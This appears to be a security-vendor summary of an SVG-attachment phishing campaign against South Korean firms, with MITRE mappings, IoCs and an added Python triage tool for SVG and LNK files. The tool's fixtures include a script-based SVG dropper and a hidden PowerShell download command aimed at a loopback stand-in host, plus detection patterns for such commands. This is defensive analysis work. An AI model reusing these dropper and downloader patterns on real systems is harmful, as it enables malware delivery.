This report describes a phishing campaign targeting domestic companies in South Korea that delivers malware in SVG format disguised as shipping notifications. An SVG file is XML rather than a plain bitmap, so it can carry embedded script that runs when the "image" is opened in a browser; the attackers attach such SVG files to emails and use them to start a multi-stage chain that ends with a trojan downloader on the victim's host. Affected: domestic companies, shipping sector
Keypoints :
- SVG format malware is being disseminated through phishing emails that appear to be legitimate shipping notifications.
- The SVG format is abused because it is generally treated as an image file, yet it is XML that can embed script and links; neither mail filters nor users expect executable content in an image, so the malicious content is less likely to be blocked.
- When the user opens the attached SVG file (typically rendered by the default web browser), a ZIP file is silently downloaded.
- The ZIP file contains a LNK (Windows shortcut) file that masquerades as a PDF; when opened, it launches PowerShell, which downloads additional malicious files.
- The downloaded payloads take several forms, including an EXE, and are designed to maintain persistence and connect to the attacker's server.
- The malware has been detected by security software as Trojan.Downloader.Agent and Trojan.Agent.LNK.Gen.
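As an added example (this is not code from the original report), the following Python triage helpers cover two stages of the chain above: flagging active content (script, event handlers, javascript: URLs, foreignObject) in an SVG attachment, and parsing a LNK file's StringData fields to pull out the PowerShell command line. Both samples are constructed placeholders; the real campaign's SVG and LNK contents are not reproduced here, and the URL in the sample shortcut is a loopback stand-in, not the IoC listed below.

```python
"""Triage helpers for the chain above: SVG attachment -> ZIP -> LNK -> PowerShell.

Added example, not code from the original report. The SVG and LNK samples are
constructed here for illustration and are not the real campaign artifacts.
"""
import re
import struct
import xml.etree.ElementTree as ET

# ---- Stage 1: SVG attachment triage -------------------------------------
# SVG is XML, so it may carry <script>, on* event handlers, javascript: URLs
# and <foreignObject>; none of these belong in a mailed "shipping notice".
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
# JavaScript idioms commonly used to materialise an embedded file in the browser
DROP_HINTS = re.compile(r"atob\(|Blob\(|createObjectURL|\.download\s*=|location\.href", re.I)


def triage_svg(svg_text: str) -> dict:
    """Return counts of active content found in an SVG body plus a verdict."""
    f = {"script": 0, "event_attrs": [], "foreign_object": 0, "drop_js": False}
    for el in ET.fromstring(svg_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]                 # strip the XML namespace
        if tag == "script":
            f["script"] += 1
            f["drop_js"] |= bool(DROP_HINTS.search(el.text or ""))
        elif tag == "foreignObject":
            f["foreign_object"] += 1
        for attr, value in el.attrib.items():
            if EVENT_ATTR.match(attr.rsplit("}", 1)[-1]) or \
               value.strip().lower().startswith("javascript:"):
                f["event_attrs"].append(attr)
    f["suspicious"] = bool(f["script"] or f["event_attrs"] or f["foreign_object"])
    return f


# ---- Stage 2: LNK parsing (MS-SHLLINK) -----------------------------------
# 76-byte ShellLinkHeader, optional LinkTargetIDList and LinkInfo, then
# StringData fields in a fixed order, each present only if its LinkFlag is set.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
# PowerShell switches and cmdlets typical of a downloader one-liner
PS_SUSPECT = re.compile(r"-w(indowstyle)?\s+hidden|-e(ncodedcommand)?\s|downloadstring|"
                        r"downloadfile|invoke-webrequest|\biwr\b|frombase64string|\biex\b", re.I)


def parse_lnk(data: bytes) -> dict:
    """Extract ShowCommand and the StringData fields (path, arguments, ...) from a .lnk."""
    if data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 76
    if flags & HAS_IDLIST:                      # skip LinkTargetIDList (u16 size + list)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                    # skip LinkInfo (u32 size includes itself)
        off += struct.unpack_from("<I", data, off)[0]
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        size = 2 * count if flags & IS_UNICODE else count
        fields[name] = data[off:off + size].decode("utf-16-le" if flags & IS_UNICODE else "cp1252")
        off += size
    return fields


def lnk_launches_powershell(fields: dict) -> bool:
    """True if the shortcut runs PowerShell with downloader-style options."""
    cmd = " ".join(v for v in fields.values() if isinstance(v, str)).lower()
    return "powershell" in cmd and bool(PS_SUSPECT.search(cmd))


def build_lnk(relative_path: str, arguments: str, show_command: int = 7) -> bytes:
    """Build a minimal Unicode .lnk as a test fixture (7 = SW_SHOWMINNOACTIVE)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    hdr = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x80)        # FILE_ATTRIBUTE_NORMAL
    hdr += b"\x00" * 24                                              # three zero FILETIMEs
    hdr += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)   # size, icon, show, hotkey, reserved
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return hdr + body


# Constructed samples (placeholders, not the campaign's files)
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="400" height="120">
  <text x="10" y="40">Shipping notice: open the attached document</text>
  <script><![CDATA[
    var zip = "UEsDBBQAAAAIAA";   /* placeholder string, not a real archive */
    var bytes = Uint8Array.from(atob(zip), function (c) { return c.charCodeAt(0); });
    var a = document.createElement("a");
    a.href = URL.createObjectURL(new Blob([bytes], {type: "application/zip"}));
    a.download = "Shipping_Documents.zip";
    a.click();
  ]]></script>
</svg>"""
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'
SAMPLE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -ep bypass -c "iwr http://127.0.0.1/stage2.txt -OutFile $env:TEMP\\s.ps1"')

if __name__ == "__main__":
    print(triage_svg(SAMPLE_SVG))
    info = parse_lnk(SAMPLE_LNK)
    print(info, "PowerShell downloader:", lnk_launches_powershell(info))
```

Real malicious shortcuts usually put the target in the LinkTargetIDList rather than in RelativePath; the parser skips that list and still recovers the arguments, which is where the PowerShell download command lives. The sample fixture uses ShowCommand 7 (SW_SHOWMINNOACTIVE) because a minimised or hidden window is a common tell in LNK droppers.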
MITRE Techniques :
- Initial Access (T1566): Phishing emails were utilized to deliver SVG format malware.
- Execution (T1059.001): PowerShell was executed from a LNK file to run malicious scripts.
- Persistence (T1547.001): The malware establishes persistence; the report describes scheduled tasks, although the listed ID T1547.001 covers Registry Run Keys / Startup Folder (scheduled tasks are T1053.005).
- Command and Control (T1071.001): The malware attempted to connect to URLs controlled by the attacker.
Indicators of Compromise :
- [Hash] A3A8D891D839DB85458419619B343394
- [Hash] 51B32CB26E24D82343D96B75E7DD6CD2
- [Hash] BC0B9E071041B9DFE3B4FF9B60EEC0FA
- [Hash] 3983983CBE707A6B657F0F65CB350424
- [URL] hxxp://87.121.79.103/download/08e8215ab5224845b5d3298a95e47c0a.txt
Full Story: https://alyacofficialblog.tistory.com/5536